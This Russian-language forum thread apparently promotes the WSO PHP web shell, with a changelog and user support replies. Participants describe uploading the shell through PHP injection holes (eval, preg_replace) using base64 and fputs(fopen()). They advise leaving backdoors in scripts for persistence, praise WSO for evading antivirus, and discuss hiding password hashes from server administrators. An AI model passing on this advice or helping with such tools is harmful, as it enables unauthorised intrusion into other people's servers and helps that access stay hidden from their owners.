Подскажите, что может быть, не заливаются файлы совсем, редактировать файлы можно, менять права и все такое, а вот залить ни один файл не получается, это на одном сайте, на втором, также все редактируется, но файлы заливаются толлько мелкие по 20кб, а вот зип архивы никак заливаться нехотят, даже 100кб, переименовывал уже zip в жпг, вообще без расширение пробовал нивкакую незаливаются

ограничивает настройка upload_max_filesize, phpinfo смотри

']ограничивает настройка upload_max_filesize, phpinfo смотри

да смотрел я 20 метров стоит ограничение, дело в чем то другом, ну это в одном в котором загружаются мелкие файлы, а на втором вообще ничего не грузится

установил пасс на шелл теперь мучаюсь, пароль не подходит :D ))

че можно сделать ?

установил пасс на шелл теперь мучаюсь, пароль не подходит :D ))

че можно сделать ?
хеш пароля?

пароль надо было в виде хеша ставить ?

я нуп(((

пароль надо было в виде хеша ставить ?

я нуп(((
да в виде хеша. MD5 вроде

залить туда другой шелл, точно также, как и первый, выставить пароль правильно. Оставлять бекдоры в скриптах - как на вот такие случаи так и на случай удаления шелла.

Новая версия
Большое спасибо (Dm) (https://forum.antichat.ru/member.php?u=53821) и другим людям, которые помогали улучшить шелл.

добавлена переменная в конфиг, отвечающая за включение/выключения ипользования AJAX по умолчанию
улучшен раздел Sql
новый формат дампа (более компактный)
возможность сохранять дамп в файл (если имя файла не указано, то дамп предлагается сразу скачать)
gui получше, навигация по таблице теперь удобней
добавлена возможность включить/отключить подсчет количества записей в таблицах
Load file выводиться, если у пользователя хватает привилегий
при неудачном коннекте к бд выводиться ошибку

добавлена возможность смотреть ошибки в Console (перенаправление stderr в stdout)
в Sec. Info добавлен вывод модулей Apache'а
теперь в файловом менеджере при наведении на ссылки (я про ссылки в фс) всплывает подсказка куда ведет ссылка
можно упаковывать в tar.gz, если доступно выполнение команд.
можно указывать названия для архивов
ссылка на поиск сплойта под ядро теперь ведет на exploit-db.com
попытался выделить место куда в Console вбивать команды более заметно)
фиксы багов




ps:

работа с postgres в шелле - шлак) Моих знаний по этой СУБД не хватает, чтобы сделать нормально.
поддержки MSSQL не будет.
по поводу добавления preview для графических файлов: можно нажать download и на предложение браузера скачать файл нажать на открыть.
wso2_pack2.php убран нафиг, тк не оправдывает своего названия. wso2.php оказался компактнее ^^
не оставляйте дефолтный пароль
по поводу:
Хотелось бы видеть вкладочку Proc. как в c99 )
ps aux в консоле. Для удобства добавил в список команд для быстрого вызова.
по поводу кодировок - нужность этой фички каждый определяет сам. Можно, конечно, менять кодировку в браузере. Мне удобней в шелле, тем более при коннекте к бд устанавливается соответствующая кодировка соединения.


gl&hf

oRb, спасибище! Это лучший шелл который я использовал,спасибо за постоянные обновления и фиксы!

лучший шелл, имхо, остальные просто меркнут (начиная с размера)

Парни, сори за ламерство, но объясните чуть по подробней, как менять пароль?
Первый раз вижу шелл, но даже не все понимая вижу что мега вещь. Спасибо.

Парни, сори за ламерство, но объясните чуть по подробней, как менять пароль?
Первый раз вижу шелл, но даже не все понимая вижу что мега вещь. Спасибо.
Жмешь на шелл правой кнопкой, выбираешь открыть с помощью "Блокнот". Дальше на второй строке есть:
$auth_pass = "63a9f0ea7bb98050796b649e85481845";
Вот это 63a9f0ea7bb98050796b649e85481845 и является md5 хешем пароля. Хешируешь желаемый пароль в md5 и заменяешь.

как распаковать zip архив на сервере?

unzip *.zip в консоли

Всегда пользуюсь этим шеллом , спасибо :)
Вопрос : можно добавить в шелл функцию редакта данных в бд ? Допустим выбрал строку и отредактил так как нужно .

Вопрос : можно добавить в шелл функцию редакта данных в бд ? Допустим выбрал строку и отредактил так как нужно .
Было бы неплохо, хотя всё это можно сделать с помощью sql команды.
UPDATE ' '
SET ' ' = ' '
WHERE ' ' = ' '
LIMIT 1

спасибо :) возможно самый лучший вообще из всех скриптов которыми я пользовался

залил на хост . выдает ошибку. точно не помню но сязано с line(1)
гуглил так и не понял как её решать

mazaxaka
мы ж тут не телепаты! ошибку в студию плз!

выдает такую ошибку

Warning: main(include/include/wso2.4/wso2_pack.php): failed to open stream: No such file or directory in /home/content/d/f/r/dfree99/html/index.php on line 4

Warning: main(include/include/wso2.4/wso2_pack.php): failed to open stream: No such file or directory in /home/content/d/f/r/dfree99/html/index.php on line 4

Warning: main(): Failed opening 'include/include/wso2.4/wso2_pack.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/content/d/f/r/dfree99/html/index.php on line 4

вот такая ошибка
/wso2.php(10) : eval()'d code on line 1

выдает такую ошибку

Warning: main(include/include/wso2.4/wso2_pack.php): failed to open stream: No such file or directory in /home/content/d/f/r/dfree99/html/index.php on line 4

Warning: main(include/include/wso2.4/wso2_pack.php): failed to open stream: No such file or directory in /home/content/d/f/r/dfree99/html/index.php on line 4

Warning: main(): Failed opening 'include/include/wso2.4/wso2_pack.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/content/d/f/r/dfree99/html/index.php on line 4


ты чо его инклюдишь откуда-то? пути проверь

Парни кто подскажет как решить проблему с ошибкой
/wso2.php(10) : eval()'d code on line 1

Супер, шикарно, мего! Сверх толковая вещь!
З.Ы. Нигде никаких ошибок не наблюдалось

Есть пара вопросов/предложений:
1) зачем была сделана галка на отображении кол-ва записей в каждой таблице БД? На очень больших таблицах грузит сильно? И кол-во каждый раз считается или только 1 раз в пределах сессии работы с одной БД? Нельзя ее значение в заголовок вынести, как аякс?
2) я тут подумал - а не хотите по дефолту реализовать соленый хэш пароля? Просто думаю многие используют один и тот же пасс на свои шеллы - и наличие одного и того же хэша (особенно если пасс уникальный) довольно сильно может повредить, если шеллы будут найдены и админ захочет погуглить.

зачем была сделана галка на отображении кол-ва записей в каждой таблице БД? На очень больших таблицах грузит сильно?с большими базами данных из-за тормозов невозможно нормально работать было.
И кол-во каждый раз считается или только 1 раз в пределах сессии работы с одной БД?Каждый раз
Нельзя ее значение в заголовок вынести, как аякс?в как-бы конфиг? Думаю можно.

По второму пункту. Соглаен так было бы лучше, но многие даже дефолтный пасс не меняют, поэтому вряд ли будут заморачиваться с солью.

ТС, объясните пожалуйста как работать с архиватором

Последняя версия плохо дампит БД. Вот что сказал один чел, который хорошо разбирается в mysql: "там сам дамп запорочен, программа которая делала этот дамп работает, мягко говоря не знает как его правильно делать". Предыдущая версия делала хорошо. Размер, конечно, был больше, но зато качество лучше

качество? лол, это не звуковая дорожка..
единственное было бы удобнее по дефолту скачку дампа а не импорт в файл, но это мелочь
\зыж в идеале бы одной кнопкой заархивированый дамп качать :D

качество? лол, это не звуковая дорожка..
Да блин не знаешь молчи. Попробуй скачать дамп размером 300мб, а потом его в пхпмайадмин сунуть.

дамп размером 300мб, а потом его в пхпмайадмин сунуть.
LOOOL я не идиот :D

Мужики, как бы проблема.

Читаю данные из БД, русские символы в таблицах отображает как знаки вопроса (типа как кириллица). Менял кодировку, нифига не помогло.

меняй кодировку с базой данных, а не самого шелла =\

SET NAMES [utf8,chcp1251,etc];

Thx. :p

Нет. А кодировку где меняешь?

my.cnf

ТС, добавь пожалуйста возможность менять дату модификации файлов/папок

ТС, добавь пожалуйста возможность менять дату модификации файлов/папок
Там уже давно включена такая возможность, при редактировании файлы есть менюшка Touch.

Может кто знает, такая фигня получилась, выбрал папку для архивации, папка весит 2 гига, я её архивирую встроенным ZIP архиватором выбирая Compress (zip), в итоге архив при вставке (paste / zip) не создался, а вот место на сервере закончилось, написанно "Free: 0", теперь как освободить место не знаю, рылся в TMP, но никаких файлов такого размера там нету... где искать хз, как удалить этот недоархивированный архив тоже хз, кто сталкивался подскажите.

+ Такая же проблема недавно была, только архив создался, после того как я его скачал, а потом удалил с сервера свободного места всё равно не было.

Там уже давно включена такая возможность, при редактировании файлы есть менюшка Touch.
да точно спасибо) удобней чем в c99

Есть маленькая мелочь.
Если например отдаёшь команду Read file : folder/js.js
То будет показываться что ты читаешь из той же папки что сейчас находишься.
http://gyazo.com/2cf89723ff38cb5fe0b2731980ee17d7.png
На самом деле файл file.js лежит в claregolf.ca

Имхо в шелле стоит убрать принудительную установку кодировки при подключении к БД. Если даже ставить UTF-8, то данные все равно будут отображаться некорректно, так как в большинстве случаев они хранятся в latin1, а такой кодировки в шелле нет. Лучше оставить все как есть, т.е. убрать вызов mysql_set_charset()

подскажите, почему у меня при наборе команды unzip *.zip архив распаковывается в новую созданную директорию с именем архива, а не прмо тут же все файлы из архива рядом с ним же?

А есть ли что-то вроде Wso manager? удобная оболочка для управления пачкой шеллов

Есть пара вопросов/предложений:
...
2) я тут подумал - а не хотите по дефолту реализовать соленый хэш пароля? Просто думаю многие используют один и тот же пасс на свои шеллы - и наличие одного и того же хэша (особенно если пасс уникальный) довольно сильно может повредить, если шеллы будут найдены и админ захочет погуглить.

По второму пункту. Соглаен так было бы лучше, но многие даже дефолтный пасс не меняют, поэтому вряд ли будут заморачиваться с солью.

Если все же будет решено реализовать, то по-моему разумно писать соль прямо в хэш так:
$auth_pass = "megasalt:acba33675579708d335032cffb0a0c32";
Т.е. кому не надо: соль не пишет туда - все по-прежнему, а для тех, кто так сделал, в шелле проверка на длину>32 например и выкусывания соли если тру.

Еще заметил, что по сравнению с 2.1 хуже стало кэшироваться (имею в виду работу шелла - возможно в генерируемых хтмл no cache выставляется где-то). Приведу пример:
на 2.1 при работе в file manager, вполне реально выбрать в лисе work offline и сделать несколько раз назад - посмотреть предыдущие странички без их перезагрузки. В 2.4 это не проходит, и при нажатии назад выкидывает на _кардинально_ иной экран (т.е. например работу с sql, если она до этого открывалась). аякс при этом в настройках отключен.

Еще заметил, что по сравнению с 2.1 хуже стало кэшироваться (имею в виду работу шелла - возможно в генерируемых хтмл no cache выставляется где-то). Приведу пример:
на 2.1 при работе в file manager, вполне реально выбрать в лисе work offline и сделать несколько раз назад - посмотреть предыдущие странички без их перезагрузки. В 2.4 это не проходит, и при нажатии назад выкидывает на _кардинально_ иной экран (т.е. например работу с sql, если она до этого открывалась). аякс при этом в настройках отключен.


Чтоб странички так просматривать, нужно иметь браузеры предназначенные для этого. Firefox, Chrome, IE - не предназначены для работы в вебшеллах. Они нужны для вКоНтакТиКа, одноклассников, беона и прочих сайтов.

Чтоб странички так просматривать, нужно иметь браузеры предназначенные для этого. Firefox, Chrome, IE - не предназначены для работы в вебшеллах. Они нужны для вКоНтакТиКа, одноклассников, беона и прочих сайтов.
Давай браузерные войны оставим для других веток? По мне так твоя опера не годится для полноценной работы (см. отсутствие кучи полезных расширений).

Я же говорю о том, что раньше работало, сейчас хуже.

Есть такая очень досадная вещь, когда при заливке шелла через уязвимость php inj (eval, preg_replace, и т.д..) шелл не работает, просто белая страница, и при этом шелл с99 заливается без проблем.
Такая вещь на куче сайтов, если не на каждом втором, из за чего это происходит я к сожалению так и не выяснил, включал в шелле экранирование ошибок и т.д... всё равно, никаких ошибок на экран не выводит (скорее из за @ почти во всех функциях =)))
А заливаю я его так, кодирую в base_64 и через fputs(fopen()) расшифровывая кладу.
Оба шелла запакованны обычным алгоритмом со сжатием, при этом с с99 проблем никогда не возникало, а WSO приходится заливать через с99, и вот тогда он кладётся нормально.

Есть такая очень досадная вещь, когда при заливке шелла через уязвимость php inj (eval, preg_replace, и т.д..) шелл не работает, просто белая страница, и при этом шелл с99 заливается без проблем.
Такая вещь на куче сайтов, если не на каждом втором, из за чего это происходит я к сожалению так и не выяснил, включал в шелле экранирование ошибок и т.д... всё равно, никаких ошибок на экран не выводит (скорее из за @ почти во всех функциях =)))
А заливаю я его так, кодирую в base_64 и через fputs(fopen()) расшифровывая кладу.
Оба шелла запакованны обычным алгоритмом со сжатием, при этом с с99 проблем никогда не возникало, а WSO приходится заливать через с99, и вот тогда он кладётся нормально.


Глянь, зайдя через с99, error_log - там будет инфа почему wso не работает.

c99 палиться антивирями как бекдор в отличии от WSO -> в защиту.

Не плохо было б кнопку download и другие, на любой файл сразу сделать, а не тогда когда кликнуть на линк.
Просто плохо ждать пока файл откроеться(если нет медленный, например, а файл огромный...).
Так как, например, в AnideNShel.

По шеллу.
Не плохо было бы его перевести с использования сессий на заголовки сервера или куки.

Почему:
- работаешь с шеллом, дал команду, которая что-то выполняет. открываешь вторую страничку шелла и она не откроется пока команда в первом окне не будет выполнена.
(это из-за использования сессий)
- на некоторых серверах (попадаются такие), веб пользователь не имеет прав на запись в session.path в результате шелл не работает. (чаще всего неправильно настроенный open_basedir)

Не плохо было б кнопку download и другие, на любой файл сразу сделать, а не тогда когда кликнуть на линк.
Есть же вроде
http://imagepost.ru/images/144/2UpoFteCWB.jpg

P.s надеюсь в WSO2.5 (если будет такая) изменят вид дампа.

Орб, я порой сталкиваюсь с необходимостью скачать всю папку с сервера. Может автоматизируешь процесс?
То есть, чтобы при нажатии "D" папка архивировалась и загружалась.

P.S.: Я конечно понимаю, что это большое количество лишнего кода => размер. Просто предложил :)

Орб, я порой сталкиваюсь с необходимостью скачать всю папку с сервера. Может автоматизируешь процесс?
То есть, чтобы при нажатии "D" папка архивировалась и загружалась.
Архивируешь папку и качаешь этот архив о_О

Архивируешь папку и качаешь этот архив о_О
Спасибо, кэп. Буду архивировать вручную 100 папок =\

---
Речь идет об автоматизации сего процесса. Отметил галочками папки, выбрал "Download", они все заархивировались и скачались.

Спасибо, кэп. Буду архивировать вручную 100 папок =\
А галочки слева для чего? Зачем же в ручную каждую папку? о_О

GrandMaster
Чувак, скажи что пошутил. Я не могу с вами, честно.

Я же вроде русским языком объяснил: МНЕ НУЖНО БЫСТРО И УДОБНО.

Дело в том, что я не использую этот продукт в хэкерских целях, в отличии от вас.
Я много работаю с папками и мне не удобно каждый раз отмечать сто папок, архивировать, затем заново отмечать сто архивов и качать.

Достаточно в левую нижнюю менюшку добавить Download selected. После нажание на который все выделенное заархивируется в ОДИН архив и скачается.

Неужели так сложно понять?

у папки ставишь галочку, внизу compress - создается архив, качаешь его

wildshaman
Да, я уже разобрался, все в порядке :)

GrandMaster
Можешь начинать злорадствовать, ыгыгы

GrandMaster
Можешь начинать злорадствовать, ыгыгы
Да я не собираюсь. Со всеми бывает ;)

добавь возможность указывать пи(лист ипов бокса) с которого работает mysql клиент.